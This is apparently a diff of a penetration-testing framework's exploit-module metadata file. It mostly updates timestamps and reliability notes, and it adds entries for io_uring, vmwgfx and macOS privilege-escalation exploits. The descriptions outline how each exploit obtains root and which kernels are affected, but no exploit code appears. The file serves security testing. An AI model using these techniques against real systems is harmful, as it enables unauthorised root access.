    "ref_name": "linux/local/abrt_sosreport_priv_esc",
@@ -72221,7 +72660,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/af_packet_chocobo_root_priv_esc",
@@ -72281,7 +72720,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/af_packet_packet_set_ring_priv_esc",
@@ -72434,7 +72873,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-10-08 09:50:25 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/asan_suid_executable_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/asan_suid_executable_priv_esc",
@@ -72590,7 +73029,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/blueman_set_dhcp_handler_dbus_priv_esc",
@@ -72643,7 +73082,7 @@
      "Linux x86",
      "Linux x64"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/bpf_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/bpf_priv_esc",
@@ -72709,7 +73148,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/bpf_sign_extension_priv_esc",
@@ -72860,7 +73299,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-08-31 15:36:00 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe.rb",
    "is_install_path": true,
    "ref_name": "linux/local/cve_2021_3490_ebpf_alu32_bounds_check_lpe",
@@ -72916,7 +73355,7 @@
      "x86_64",
      "aarch64"
    ],
-    "mod_time": "2021-12-02 10:31:47 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/cve_2021_3493_overlayfs.rb",
    "is_install_path": true,
    "ref_name": "linux/local/cve_2021_3493_overlayfs",
@@ -73040,7 +73479,7 @@
      "x86",
      "aarch64"
    ],
-    "mod_time": "2022-03-09 11:06:26 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb",
    "is_install_path": true,
    "ref_name": "linux/local/cve_2021_4034_pwnkit_lpe_pkexec",
@@ -73156,7 +73595,7 @@
    "targets": [
      "Ubuntu Linux 5.13.0-37"
    ],
-    "mod_time": "2022-04-21 07:44:40 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/cve_2022_0995_watch_queue.rb",
    "is_install_path": true,
    "ref_name": "linux/local/cve_2022_0995_watch_queue",
@@ -73180,6 +73619,63 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_linux/local/cve_2022_1043_io_uring_priv_esc": {
+    "name": "io_uring Same Type Object Reuse Priv Esc",
+    "fullname": "exploit/linux/local/cve_2022_1043_io_uring_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": "2022-03-22",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Ryota Shiga",
+      "Mathias Krause"
+    ],
+    "description": "This module exploits a bug in io_uring leading to an additional put_cred()\n          that can be exploited to hijack credentials of other processes.\n\n          We spawn SUID programs to get the free'd cred object reallocated by a\n          privileged process and abuse them to create a SUID root binary ourselves\n          that'll pop a shell.\n\n          The dangling cred pointer will, however, lead to a kernel panic as soon as\n          the task terminates and its credentials are destroyed. We therefore detach\n          from the controlling terminal, block all signals and rest in silence until\n          the system shuts down and we get killed hard, just to cry in vain, seeing\n          the kernel collapse.\n\n          The bug affected kernels from v5.12-rc3 to v5.14-rc7.\n\n          More than 1 CPU is required for exploitation.\n\n          Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic",
+    "references": [
+      "URL-https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse",
+      "URL-https://github.com/opensrcsec/same_type_object_reuse_exploits",
+      "URl-https://github.com/torvalds/linux/commit/a30f895ad3239f45012e860d4f94c1a388b36d14",
+      "CVE-2022-1043"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2023-02-02 10:19:07 +0000",
+    "path": "/modules/exploits/linux/local/cve_2022_1043_io_uring_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/cve_2022_1043_io_uring_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_linux/local/desktop_privilege_escalation": {
    "name": "Desktop Linux Password Stealer and Privilege Escalation",
    "fullname": "exploit/linux/local/desktop_privilege_escalation",
@@ -73253,7 +73749,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/diamorphine_rootkit_signal_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/diamorphine_rootkit_signal_priv_esc",
@@ -73302,7 +73798,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/docker_daemon_privilege_escalation.rb",
    "is_install_path": true,
    "ref_name": "linux/local/docker_daemon_privilege_escalation",
@@ -73457,7 +73953,7 @@
    "targets": [
      "Exim 4.87 - 4.91"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/exim4_deliver_message_priv_esc",
@@ -73641,7 +74137,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/glibc_realpath_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/glibc_realpath_priv_esc",
@@ -73741,7 +74237,7 @@
      "Linux x86",
      "Linux x64"
    ],
-    "mod_time": "2022-10-05 19:43:07 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/hp_xglance_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/hp_xglance_priv_esc",
@@ -73889,7 +74385,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-10-05 19:43:07 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ktsuss_suid_priv_esc",
@@ -73940,7 +74436,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/lastore_daemon_dbus_priv_esc",
@@ -73990,7 +74486,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-10-05 19:43:07 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/libuser_roothelper_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/libuser_roothelper_priv_esc",
@@ -74058,7 +74554,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-10-08 09:16:57 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/nested_namespace_idmap_limit_priv_esc",
@@ -74292,7 +74788,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/network_manager_vpnc_username_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/network_manager_vpnc_username_priv_esc",
@@ -74383,7 +74879,7 @@
    "targets": [
      "Micro Focus (HPE) Data Protector <= 10.40 build 118"
    ],
-    "mod_time": "2022-10-05 19:43:07 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/omniresolve_suid_priv_esc",
@@ -74655,7 +75151,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/ptrace_sudo_token_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ptrace_sudo_token_priv_esc",
@@ -74704,7 +75200,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-11-12 16:19:50 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/ptrace_traceme_pkexec_helper.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ptrace_traceme_pkexec_helper",
@@ -74809,7 +75305,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc",
@@ -74866,7 +75362,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/rds_rds_page_copy_user_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/rds_rds_page_copy_user_priv_esc",
@@ -74926,7 +75422,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/recvmmsg_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/recvmmsg_priv_esc",
@@ -74971,7 +75467,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/reptile_rootkit_reptile_cmd_priv_esc",
@@ -75075,7 +75571,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-10-08 09:50:25 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/servu_ftp_server_prepareinstallation_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/servu_ftp_server_prepareinstallation_priv_esc",
@@ -75133,7 +75629,7 @@
    "targets": [
      "Linux x86"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/sock_sendpage.rb",
    "is_install_path": true,
    "ref_name": "linux/local/sock_sendpage",
@@ -75366,7 +75862,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-10-08 09:50:25 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/systemtap_modprobe_options_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/systemtap_modprobe_options_priv_esc",
@@ -75421,7 +75917,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-12-01 14:34:09 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ubuntu_enlightenment_mount_priv_esc",
@@ -75581,7 +76077,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/ufo_privilege_escalation.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ufo_privilege_escalation",
@@ -75633,7 +76129,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-12-01 14:55:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/vcenter_java_wrapper_vmon_priv_esc",
@@ -75698,7 +76194,7 @@
      "Linux x86",
      "Linux x64"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/linux/local/vmware_alsa_config.rb",
    "is_install_path": true,
    "ref_name": "linux/local/vmware_alsa_config",
@@ -75829,6 +76325,62 @@
    ],
    "needs_cleanup": null
  },
+  "exploit_linux/local/vmwgfx_fd_priv_esc": {
+    "name": "vmwgfx Driver File Descriptor Handling Priv Esc",
+    "fullname": "exploit/linux/local/vmwgfx_fd_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 400,
+    "disclosure_date": "2022-01-28",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Mathias Krause"
+    ],
+    "description": "If the vmwgfx driver fails to copy the 'fence_rep' object to userland, it tries to\n          recover by deallocating the (already populated) file descriptor. This is\n          wrong, as the fd gets released via put_unused_fd() which shouldn't be used,\n          as the fd table slot was already populated via the previous call to\n          fd_install(). This leaves userland with a valid fd table entry pointing to\n          a free'd 'file' object.\n\n          We use this bug to overwrite a SUID binary with our payload and gain root.\n          Linux kernel 4.14-rc1 - 5.17-rc1 are vulnerable.\n\n          Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic.",
+    "references": [
+      "URL-https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse",
+      "URL-https://github.com/opensrcsec/same_type_object_reuse_exploits",
+      "CVE-2022-22942"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2023-02-02 18:17:02 +0000",
+    "path": "/modules/exploits/linux/local/vmwgfx_fd_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/vmwgfx_fd_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-os-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_linux/local/yum_package_manager_persistence": {
    "name": "Yum Package Manager Persistence",
    "fullname": "exploit/linux/local/yum_package_manager_persistence",
@@ -77350,7 +77902,7 @@
      "Unix Command",
      "Linux Dropper"
    ],
-    "mod_time": "2021-11-18 16:33:52 +0000",
+    "mod_time": "2022-06-23 16:28:10 +0000",
    "path": "/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/nimbus_gettopologyhistory_cmd_exec",
@@ -79253,7 +79805,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2022-04-18 09:36:52 +0000",
+    "mod_time": "2023-01-31 23:59:22 +0000",
    "path": "/modules/exploits/linux/ssh/solarwinds_lem_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/solarwinds_lem_exec",
@@ -79261,6 +79813,15 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -79298,7 +79859,7 @@
    "targets": [
      "Symantec Messaging Gateway 9.5"
    ],
-    "mod_time": "2022-04-18 09:36:52 +0000",
+    "mod_time": "2023-01-31 23:59:22 +0000",
    "path": "/modules/exploits/linux/ssh/symantec_smg_ssh.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/symantec_smg_ssh",
@@ -79306,6 +79867,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -79339,7 +79909,7 @@
    "targets": [
      "Universal"
    ],
-    "mod_time": "2022-04-18 09:36:52 +0000",
+    "mod_time": "2023-01-31 23:59:22 +0000",
    "path": "/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb",
    "is_install_path": true,
    "ref_name": "linux/ssh/vmware_vdp_known_privkey",
@@ -79347,6 +79917,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -93857,7 +94436,7 @@
      "Windows",
      "Linux"
    ],
-    "mod_time": "2018-12-14 13:08:50 +0000",
+    "mod_time": "2022-12-30 12:29:14 +0000",
    "path": "/modules/exploits/multi/http/struts2_namespace_ognl.rb",
    "is_install_path": true,
    "ref_name": "multi/http/struts2_namespace_ognl",
@@ -97635,7 +98214,7 @@
      "h00die <mike@stcyrsecurity.com>",
      "KotCzarny"
    ],
-    "description": "This module attempts to exploit a debug backdoor privilege escalation in\n          Allwinner SoC based devices.\n          Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4\n          Vulnerable OS: all OS images available for Orange Pis,\n                         any for FriendlyARM's NanoPi M1,\n                         SinoVoip's M2+ and M3,\n                         Cuebietech's Cubietruck +\n                         Linksprite's pcDuino8 Uno\n          Exploitation may be possible against Dragon (x10) and Allwinner Android tablets",
+    "description": "This module attempts to exploit a debug backdoor privilege escalation in\n          Allwinner SoC based devices.\n\n          Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.\n\n          Vulnerable OS: all OS images available for Orange Pis,\n          any for FriendlyARM's NanoPi M1,\n          SinoVoip's M2+ and M3,\n          Cuebietech's Cubietruck +\n          Linksprite's pcDuino8 Uno.\n          Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.",
    "references": [
      "CVE-2016-10225",
      "URL-http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/",
@@ -97654,7 +98233,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-01-28 15:02:24 +0000",
    "path": "/modules/exploits/multi/local/allwinner_backdoor.rb",
    "is_install_path": true,
    "ref_name": "multi/local/allwinner_backdoor",
@@ -97662,6 +98241,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "shell",
@@ -97683,7 +98271,7 @@
      "Romain Trouve",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module attempts to gain root privileges on systems running\n        MagniComp SysInfo versions prior to 10-H64.\n\n        The .mcsiwrapper suid executable allows loading a config file using the\n        '--configfile' argument. The 'ExecPath' config directive is used to set\n        the executable load path. This module abuses this functionality to set\n        the load path resulting in execution of arbitrary code as root.\n\n        This module has been tested successfully with SysInfo version\n        10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on\n        Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.",
+    "description": "This module attempts to gain root privileges on systems running\n          MagniComp SysInfo versions prior to 10-H64.\n\n          The .mcsiwrapper suid executable allows loading a config file using the\n          '--configfile' argument. The 'ExecPath' config directive is used to set\n          the executable load path. This module abuses this functionality to set\n          the load path resulting in execution of arbitrary code as root.\n\n          This module has been tested successfully with SysInfo version\n          10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on\n          Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.",
    "references": [
      "CVE-2017-6516",
      "BID-96934",
@@ -97705,7 +98293,7 @@
      "Solaris",
      "Linux"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-01-28 15:02:24 +0000",
    "path": "/modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc",
@@ -97718,6 +98306,9 @@
      ],
      "Stability": [
        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
      ]
    },
    "session_types": [
@@ -97823,7 +98414,7 @@
      "Linux x64",
      "Linux x86"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2023-01-28 15:02:24 +0000",
    "path": "/modules/exploits/multi/local/xorg_x11_suid_server.rb",
    "is_install_path": true,
    "ref_name": "multi/local/xorg_x11_suid_server",
@@ -97831,6 +98422,16 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
    },
    "session_types": [
      "shell",
@@ -97851,7 +98452,7 @@
      "Narendra Shinde",
      "Aaron Ringo"
    ],
-    "description": "This module attempts to gain root privileges with SUID Xorg X11 server\n        versions 1.19.0 < 1.20.3.\n\n        A permission check flaw exists for -modulepath and -logfile options when\n        starting Xorg.  This allows unprivileged users that can start the server\n        the ability to elevate privileges and run arbitrary code under root\n        privileges.\n\n        This module has been tested with CentOS 7 (1708).\n        CentOS default install will require console auth for the users session.\n        Xorg must have SUID permissions and may not start if running.\n\n        On successful exploitation artifacts will be created consistant\n        with starting Xorg.",
+    "description": "This module attempts to gain root privileges with SUID Xorg X11 server\n          versions 1.19.0 < 1.20.3.\n\n          A permission check flaw exists for -modulepath and -logfile options when\n          starting Xorg.  This allows unprivileged users that can start the server\n          the ability to elevate privileges and run arbitrary code under root\n          privileges.\n\n          This module has been tested with CentOS 7 (1708).\n          CentOS default install will require console auth for the users session.\n          Xorg must have SUID permissions and may not start if running.\n\n          On successful exploitation artifacts will be created consistant\n          with starting Xorg.",
    "references": [
      "CVE-2018-14665",
      "BID-105741",
@@ -97875,7 +98476,7 @@
      "Solaris x86",
      "Solaris x64"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2023-01-28 15:02:24 +0000",
    "path": "/modules/exploits/multi/local/xorg_x11_suid_server_modulepath.rb",
    "is_install_path": true,
    "ref_name": "multi/local/xorg_x11_suid_server_modulepath",
@@ -97883,6 +98484,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-service-down"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "shell",
@@ -101381,7 +101991,7 @@
      "Qualys",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module exploits a vulnerability in the OpenBSD `ld.so`\n        dynamic loader (CVE-2019-19726).\n\n        The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`\n        environment variable when set with approximately `ARG_MAX` colons.\n\n        This can be abused to load `libutil.so` from an untrusted path,\n        using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid\n        executable, resulting in privileged code execution.\n\n        This module has been tested successfully on:\n\n        OpenBSD 6.1 (amd64); and\n        OpenBSD 6.6 (amd64)",
+    "description": "This module exploits a vulnerability in the OpenBSD `ld.so`\n          dynamic loader (CVE-2019-19726).\n\n          The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH`\n          environment variable when set with approximately `ARG_MAX` colons.\n\n          This can be abused to load `libutil.so` from an untrusted path,\n          using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid\n          executable, resulting in privileged code execution.\n\n          This module has been tested successfully on:\n\n          OpenBSD 6.1 (amd64); and\n          OpenBSD 6.6 (amd64)",
    "references": [
      "CVE-2019-19726",
      "EDB-47780",
@@ -101403,7 +102013,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-09-18 11:38:43 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/openbsd/local/dynamic_loader_chpass_privesc.rb",
    "is_install_path": true,
    "ref_name": "openbsd/local/dynamic_loader_chpass_privesc",
@@ -101411,6 +102021,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "shell"
@@ -102406,6 +103025,62 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_osx/local/mac_dirty_cow": {
+    "name": "macOS Dirty Cow Arbitrary File Write Local Privilege Escalation",
+    "fullname": "exploit/osx/local/mac_dirty_cow",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-12-17",
+    "type": "exploit",
+    "author": [
+      "Ian Beer",
+      "Zhuowei Zhang",
+      "timwr"
+    ],
+    "description": "An app may be able to execute arbitrary code with kernel privileges",
+    "references": [
+      "CVE-2022-46689",
+      "URL-https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c",
+      "URL-https://github.com/zhuowei/MacDirtyCowDemo"
+    ],
+    "platform": "OSX",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Mac OS X x64 (Native Payload)"
+    ],
+    "mod_time": "2023-02-01 16:56:28 +0000",
+    "path": "/modules/exploits/osx/local/mac_dirty_cow.rb",
+    "is_install_path": true,
+    "ref_name": "osx/local/mac_dirty_cow",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
+    },
+    "session_types": [
+
+    ],
+    "needs_cleanup": true
+  },
  "exploit_osx/local/nfs_mount_root": {
    "name": "Mac OS X NFS Mount Privilege Escalation Exploit",
    "fullname": "exploit/osx/local/nfs_mount_root",
@@ -103004,7 +103679,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2023-02-02 18:46:08 +0000",
    "path": "/modules/exploits/osx/local/vmware_fusion_lpe.rb",
    "is_install_path": true,
    "ref_name": "osx/local/vmware_fusion_lpe",
@@ -103012,6 +103687,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
    },
    "session_types": [
      "shell",
@@ -103258,7 +103942,7 @@
      "Tim Brown",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "This module attempts to gain root privileges on QNX 6.4.x and 6.5.x\n        systems by exploiting the ifwatchd suid executable.\n\n        ifwatchd allows users to specify scripts to execute using the '-A'\n        command line argument; however, it does not drop privileges when\n        executing user-supplied scripts, resulting in execution of arbitrary\n        commands as root.\n\n        This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n        and 6.5.0 SP1 (x86).",
+    "description": "This module attempts to gain root privileges on QNX 6.4.x and 6.5.x\n          systems by exploiting the ifwatchd suid executable.\n\n          ifwatchd allows users to specify scripts to execute using the '-A'\n          command line argument; however, it does not drop privileges when\n          executing user-supplied scripts, resulting in execution of arbitrary\n          commands as root.\n\n          This module has been tested successfully on QNX Neutrino 6.5.0 (x86)\n          and 6.5.0 SP1 (x86).",
    "references": [
      "CVE-2014-2533",
      "BID-66449",
@@ -103277,7 +103961,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2023-02-02 18:17:02 +0000",
    "path": "/modules/exploits/qnx/local/ifwatchd_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "qnx/local/ifwatchd_priv_esc",
